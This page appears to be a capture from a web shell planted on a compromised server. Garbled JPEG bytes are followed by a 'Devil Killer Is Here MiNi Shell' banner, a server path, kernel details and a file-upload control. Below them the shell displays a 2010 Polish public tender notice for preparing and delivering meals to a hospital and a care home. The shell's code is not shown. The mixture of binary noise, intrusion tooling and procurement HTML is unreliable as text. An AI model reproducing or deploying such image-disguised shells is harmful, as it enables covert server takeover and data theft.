JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100317/59167-N-2010.html

<p class="kh_header"><b>Świętochłowice: Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Zakładu Opiekuńczo Leczniczego oraz Szpitala Powiatowego.</b><br>
<b>Numer ogłoszenia: 59167 - 2010; data zamieszczenia: 17.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Chorzowska 38, 41-605 Świętochłowice, woj. śląskie, tel. 032 2453338, faks 032 7707435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Zakładu Opiekuńczo Leczniczego oraz Szpitala Powiatowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Zakładu Opiekuńczo Leczniczego oraz Szpitala Powiatowego.


Zakres zamówienia obejmuje II części (pakiety) - załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia.


Pakiet I - Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Zakładu Opiekuńczo-Leczniczego przy ul. Szpitalnej 2, 41-600 Świętochłowice.
Przedmiot zamówienia obejmuje przygotowanie i dostarczenie posiłków do około 45 pacjentów  Zakładu Opiekuńczo Leczniczego.  W tym 50%  posiłków stanowi  dieta podstawowa, a pozostałe  50% stanowi dieta: płynna, cukrzycowa, wątrobowa.
Całodobowe wyżywienie powinno składać się z trzech posiłków:
śniadanie, obiad, kolacja,
Śniadanie: zupa mleczna 350ml, pieczywo 100g, masło 15g, herbata 250ml,
Obiad: zupa 350ml, drugie danie (np. porcja kurczaka 180g, ziemniaki 200g, surówka 150g), kompot 250 ml,
Kolacja: pieczywo 100g, masło 15g, herbata 250ml, dodatek (np. wędlina 50g, jajko 50g, dżem 60g).
Zamawiający wymaga aby w jadłospisie dekadowym występowały co najmniej: 4 posiłki mięsne, 3 półmięsne oraz 3 bezmięsne, przy założeniu, iż w niedzielę i święta powinno być dostarczone danie mięsne.

Pakiet II - Świadczenie usług w zakresie kompleksowego - codziennego i całodobowego - przygotowania i dostarczania posiłków do kuchenek oddziałowych Szpitala Powiatowego:
-  Oddziału  Rehabilitacji Neurologicznej i Ogólnoustrojowej;
-  Oddziału Otolaryngologii;
-  Oddziału Pediatrii;
-  Oddziału Chirurgii;
-  Oddziału Wewnętrznego;
-  Oddziału Psychiatrii;
-  Oddziału  Położniczo - Ginekologicznego.
Ogólna liczba pacjentów Szpitala Powiatowego stanowi około 190 pacjentów, w tym około 20 pacjentów to pacjenci Oddziału Pediatrycznego. 
Całodobowe wyżywienie powinno składać się z trzech posiłków: śniadanie, obiad, kolacja. 
Śniadanie: zupa mleczna 350ml, pieczywo 100g, masło 15g, herbata 250ml, dodatek dla Oddziału Pediatrycznego około 20 dzieci. (np. miód 60g, wędlina 50g, pasztet 50g);
Obiad: zupa 350ml, drugie danie (np. porcja kurczaka 180g, ziemniaki 200g, surówka 150g), kompot 250ml;
Kolacja: pieczywo 100g, masło 15g, herbata 250ml, dodatek (np. wędlina 50g, jajko 50g, dżem 60g).
Zamawiający wymaga aby w jadłospisie dekadowym występowały co najmniej: 4 posiłki mięsne, 3 półmięsne oraz 3 bezmięsne, przy założeniu, iż w niedzielę i święta powinno być dostarczone danie mięsne.
Dieta cukrzycowa i wrzodowa- pięć posiłków, co stanowi 20% ogólnej liczby pacjentów. 
Dieta podstawowa stanowi  50% ogólnej liczby pacjentów, a  diety pozostałe (wątrobowa, lekkostrawna, bezsolna, płynna) stanowią 30%.

Każdy posiłek podstawowy - śniadanie, obiad, kolacja - musi zawierać dostateczną ilość produktów białkowych oraz dodatek warzyw. Posiłki muszą charakteryzować się wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę. Niedopuszczalne jest, aby dostarczane posiłki miały postać półproduktów.

Posiłki powinny być dostarczone do kuchenek oddziałowych w termosach i odpowiednich naczyniach (pojemnikach). Termosy i naczynia (pojemniki) powinny  posiadać atesty, dopuszczające je do transportu żywności, muszą być w dobrym stanie technicznym i higienicznym. Pojemniki z termosów powinny pasować do wózków transportujących posiłki na oddziały.

Pojemność wózka:

Typ pojemnika		Wymiary			Ilość sztuk

GN 1/1                                    32,5 * 53cm                             1
GN 1/2                                    26,5 * 32,5cm                          2
GN 1/3                                    17,6 * 32,5cm                          3

 
Pojemniki ze stali nierdzewnej + pokrywy z uszczelką silikonową.

Wykonawca jest odpowiedzialny za utrzymanie w/w pojemników w czystości.

Temperatury przywożonych dań gorących, powinny być następujące:
-   	zupy - powyżej 75 stopni C
-	drugie dania - powyżej 63 stopni C
Pomiar temperatury będzie się odbywał po dostarczeniu posiłków na oddział. 

Przygotowanie i transport wszystkich posiłków podlegać będzie kontroli wyrywkowej, dokonywanej przez inspekcję sanitarną i PIH.
Posiłki dla pacjentów powinny być przygotowane zgodnie z zaleceniami wydanymi przez Instytut Żywienia i Żywności oraz z zasadami żywienia zbiorowego w placówkach lecznictwa zamkniętego. Całodzienne żywienie pacjentów sporządzane będzie na podstawie jadłospisu uzgodnionego pomiędzy Zamawiającym a Wykonawcą z tygodniowym wyprzedzeniem. Do przygotowania posiłków należy  używać  tylko świeże warzywa i owoce, natomiast mięsa, wędliny, sery poza świeżością muszą być przygotowane z należytą starannością, z zachowaniem ich smaku, estetyki, gramatury. Oznacza to, że muszą być opakowane i transportowane zgodnie z obowiązującymi wymogami sanitarno - epidemiologicznymi. 
Składniki diet muszą być skonsultowane z dietetyczką Zamawiającą.
Dzienny dowód dostawy musi być potwierdzony przez osobę  odbierającą dany posiłek t.j. dietetyczkę, pielęgniarkę oddziałową lub pielęgniarkę dyżurującą. Potwierdzenie wykonania   usługi w danym dniu powinno być pod względem ilościowym i jakościowym zgodnie z jadłospisem.

Wykonawca ponosi pełna odpowiedzialność cywilną  i finansową  za jakość  dostarczanych  posiłków   oraz skutki wynikające z zaniedbań przy ich przygotowywaniu i transporcie, mogące mięć negatywny wpływ na zdrowie żywionych pacjentów.

Wykonawca   ma    obowiązek    przechowywać     próbki  z   potraw i    produktów wchodzących w skład dostarczanych posiłków, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 17 kwietnia 2007 r. w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego.

Posiłki muszą być dostarczane w następujących godzinach:
-   śniadanie           	              7:00 - 8:00
-   obiad, kolacja                       12:00 - 13:30
Posiłki należy przywozić  dwa razy dziennie. 
Przy dostarczeniu kolacji wraz z obiadem, Zamawiający wymaga aby pieczywo i dodatki były porcjowane na jednego pacjenta.

Koszt całodobowego wyżywienia pacjenta, zawiera oprócz wsadu, także koszt przygotowania oraz dostarczenia posiłków.
Wykonawca musi posiadać wymagane uprawnienia i pozwolenia na wykonywanie tej usługi wraz z dopuszczeniem przez Sanepid.
Zamówieniem oraz rozdziałem posiłków będzie zajmować się dietetyczka, lub wyznaczona pielęgniarka, która kontrolowała będzie ilość dostarczonych porcji, rodzaje diet, jakość potraw i temperatury posiłków. 

Codziennie rano do godziny 8:00 zgłaszany będzie aktualny stan chorych i ilość poszczególnych diet. Wszystkie dostarczone produkty do śniadania, czy kolacji np.: chleb, masło, wędlina, ser itp. muszą  być porcjowane na jednego pacjenta.

Sporządzanie jadłospisu dekadowego leży po stronie Wykonawcy. Przy sporządzaniu jadłospisu Wykonawca zobowiązany jest konsultować rodzaje posiłków z dietetyczką Zamawiającego. Wszystkie jadłospisy muszą posiadać wyszczególnioną  gramaturę  np. mięs, sosów, surówek.

Zamawiający zastrzega sobie możliwość zwrotu posiłków na podstawie protokołu stanowiącego Załącznik nr 2 do wzoru umowy. 
W przypadku      stwierdzenia         nieprawidłowości        jakościowych   w       miejsce zakwestionowanych   posiłków    muszą     być    w ciągu    1 godziny       dostarczone właściwe.

W ramach ceny oferty Wykonawca musi zapewnić pokrycie wszystkich kosztów związanych z przygotowaniem i dostarczeniem posiłków do kuchenek oddziałowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten  będzie  uważany za  spełniony jeżeli  Wykonawca  potwierdzi posiadanie  wymaganych prawem zezwoleń na prowadzenie działalności w zakresie objętym przedmiotem zamówienia.

Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.

Jeżeli Wykonawca powierzy wykonanie ww. warunków innym podmiotom, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawca obowiązany jest przedstawić wykaz wykonanych lub wykonywanych  usług  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. 

Dla Pakietu I - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże wykonanie/ wykonywanie minimum 1 usługi w w/w okresie w zakresie żywienia zbiorowego pacjentów w placówkach służby zdrowia o minimalnej ilości łóżek- 45, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie.
Dla Pakietu II - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże wykonanie/ wykonywanie minimum 2 usług w w/w okresie w zakresie żywienia zbiorowego pacjentów w placówkach służby zdrowia o minimalnej ilości łóżek- 180 z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie.

Ocena spełnienia ww. warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.

Jeżeli Wykonawca powierzy wykonanie ww. warunków innym podmiotom, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku należy złożyć oświadczenie o dysponowaniu kuchnią,stołówką, która zabezpieczy przygotowanie i dostarczenie posiłków do kuchenek oddziałowych Zamawiającego przez cały okres świadczenia usługi oraz jej lokalizacji, z której dostarczane będą posiłki (należy podać dokładny adres). 

Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.

Jeżeli Wykonawca powierzy wykonanie ww. warunków innym podmiotom, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku należy złożyć oświadczenie o dysponowaniu kuchnią,stołówką, która zabezpieczy przygotowanie i dostarczenie posiłków do kuchenek oddziałowych Zamawiającego przez cały okres świadczenia usługi oraz jej lokalizacji, z której dostarczane będą posiłki (należy podać dokładny adres). 

Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.

Jeżeli Wykonawca powierzy wykonanie ww. warunków innym podmiotom, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku należy wykazać posiadanie opłaconej polisy OC, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte  w dokumentach i oświadczeniach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu i wykazania braku podstaw do wykluczenia z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony  formularz ofertowy - Załącznik nr 1,
- Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy 
z dnia 29 stycznia 2004 r.  Prawo  Zamówień Publicznych (Dz. U. Nr 223 z 2007 r., poz. 1655 - tekst jednolity z późn. zm.) - Załącznik nr 3,
- Oświadczenie  o   dysponowaniu   kuchnią /  stołówką, która   zabezpieczy przygotowanie  i dostarczenie posiłków do kuchenek oddziałowych Zamawiającego przez cały okres świadczenia usługi oraz jej lokalizacji (należy podać dokładny adres). Jeżeli Wykonawca powierzy wykonanie usługi innym podmiotom zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia,
